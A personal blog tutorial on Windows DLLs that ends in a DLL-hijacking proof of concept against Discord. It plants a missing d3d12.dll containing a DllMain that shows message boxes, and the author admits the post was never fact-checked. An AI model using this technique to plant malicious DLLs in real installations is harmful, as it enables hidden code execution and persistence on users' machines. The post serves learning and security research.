Hijacking a DLL from Discord to achieve Command Execution

Introduction

I wrote this post a long time ago, I didn't bother to check any information/writing so don't take this post to seriously. Also there is a chance that Discord already fixed the stupid way they search for DLLs, in that case the post is outdated and not applicable anymore. Though i don't think this happened because at the time i wrote this, the flaw as already known but Discord deliberated choose to not fix it.

I saw @hackingnaweb creating an fully undetectable malware hijacking a dll that discord uses and it looks quite interesting. I still don’t now with I’m going too deep in this because i have almost a hundred projects that i started and just forget it for some time for some reason.

What is a DLL?

So at the beginning I’m going to explain what are dlls.

Dll stands for Dynamic linked library, they are code/executable binaries like .exes(both have PE signature) but dlls are made to be import/export data, code, functions or whatever, so they cannot run directly, they also can be shared and reused by multiple programs at the same time. When you are compiling an dll, the compiler(at least in my case) will create two files: .lib and .dll.

~ lib files are static libraries, so when you import an function from an .lib file, the compiler will link that function inside your binary at compile time.

~ dll are dynamic(as the name says), so when you import an function from an dll, the compiler will NOT load it into your binary but instead it will import it at execution time.

Creating and Loading a simple DLL

Now I’m gonna create two dlls, one without an entry point(like a main function) that just print an message and another with an entry point. Let’s start.

I’m developing my thing in Linux and using an cross-compiler to compile for Windows because development in Windows suck asf.

helloDll.cpp:

helloDll.cpp

To compile(in my case) you will need an cross compiler, install one(mingw64) using your favorite package manager and compile your helloDll.cpp

Compiling:

Now we have this helloDLL.o file, the .o extension means that it’s an object file(bytecode). The next step is to link the file

Linking:

By now, dll is done but we also need the executable that will use this, let’s create it.

#include <stdio.h>
#include <windows.h>

int main() {
  // define an handle and load the dll hellodll whithout additional loadings
  // and with default behavior
  HMODULE const HelloDll = LoadLibraryExW(L"hello.dll",nullptr,0);

  // error checking
  if(HelloDll == NULL) {
    puts("Couldn't find the dll. Exiting...");
    return 1;
  }

  // this line uses a typedef statement to create a new type alias named GetGreetingType
  using GetGreetingType = char const* (__cdecl*)();

  // get the address function and cast into the typedef defined before.
  GetGreetingType const GetGreeting = reinterpret_cast<GetGreetingType>(GetProcAddress(HelloDll,"GetGreeting"));

  // call the function
  puts(GetGreeting());

  // unload the library and return
  FreeLibrary(HelloDll);
  return 0;
}

So this code is responsible to load the hello.dll using functions from <windows.h> and call the function GetGreeting. I’m not going to very deep in EVERY detail that is going in this code, win32api can be very ugly sometimes. But I’m gonna talk about the LoadLibrary. When you specify the dll without giving the function the Absolute Path, it will search in this order.

There are known Dll’s that are exception such as kernel32.dll, ntdll.dll and so on. When some executable is calling one of these, the loader know exactly where find them. And an dll, which is a dependency/lib from an binary, can also have dependencies of another binaries. Our hello.dll have dependencies of the kernel32.dll because of the functions that we are using.

Definition: An implicit dependency exists when a DLL relies on another resource or library without explicitly declaring it. The DLL infers this dependency by referencing the resource or library name within its code.
How it works: The operating system or loader typically tries to resolve these dependencies automatically. When the DLL code references another resource (like a function or variable), the system searches for a definition that matches the reference and links them together.
Example: Imagine a DLL (A) has code that calls a function named DoSomething without mentioning any specific library. If there's another DLL (B) that exports a function named DoSomething, the loader might implicitly assume A depends on B and link them together.

Compiling:

So now we are ready to test our hello.dll:

:) First dll created, it’s your turn to get more used to it and create your own dll with an entry point.

Discord Dll Hijacking

Now finally I’m going to hijacking that discord dll lol.

So, first of all let’s use procmon to see what discord tries to load when it starts.

You may be scared with this bunch of things, procmon is like a task manager but a way better, it’s monitoring all things that all process that are/was running are/was doing. Let’s add some filters to find what we are looking for.

Then press Ctrl+F to open the Filter Tab and add an filter to include only the Process Name Discord.exe. (Don’t forget to run the discord after that)

Still will be displayed a lot of useless stuff in our case, so I recommend add this other filters.

That will display only dlls that discord have tried to find but couldn’t for some reason. As in my sources from this “project” I will use the d3d12.dll as well.

So you probably remember what an program do when it tries to load an dll, in this case I’ll create the dll d3d12.dll that is missing inside of the discord executable folder and hope that when I start discord it gets executed.

I’ll provide the code but I’m just displaying an message box inside the main function to see if my code is running.

#include <windows.h>

extern "C" BOOL WINAPI DllMain(HINSTANCE hModule, DWORD ul_reason_for_call,LPVOID lpReserved) {

  switch (ul_reason_for_call) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL,
        TEXT("DLL Hijacking verified Process Attach!"),
        TEXT("DLL Hijacking BVS"),
        MB_ICONERROR | MB_OK);
  case DLL_THREAD_ATTACH:
    MessageBox(NULL,
        TEXT("DLL Hijacking verified Thread Attach"),
        TEXT("DLL Hijacking BVS"),
        MB_ICONERROR | MB_OK);
  case DLL_THREAD_DETACH:
    MessageBox(NULL,
        TEXT("DLL Hijacking verified Thread Detach"),
        TEXT("DLL Hijack BVS"),
        MB_ICONERROR | MB_OK);
  case DLL_PROCESS_DETACH:
    MessageBox(NULL,
        TEXT("DLL Hijacking verified Proces Detach"),
        TEXT("DLL Hijack BVS"),
        MB_ICONERROR | MB_OK);
    break;
  }
return TRUE;
}

And there is, Discord isn’t crashing and our code is running :)

Sources

MitchHS, GitHub Discord DLL Hijacking Bob Van, Infosec DLL Hijacking Persistence CppCon Talk about DLLs https://s1gh.sh/discord-dll-hijacking-persistence/ https://www.youtube.com/watch?v=3eROsG_WNpE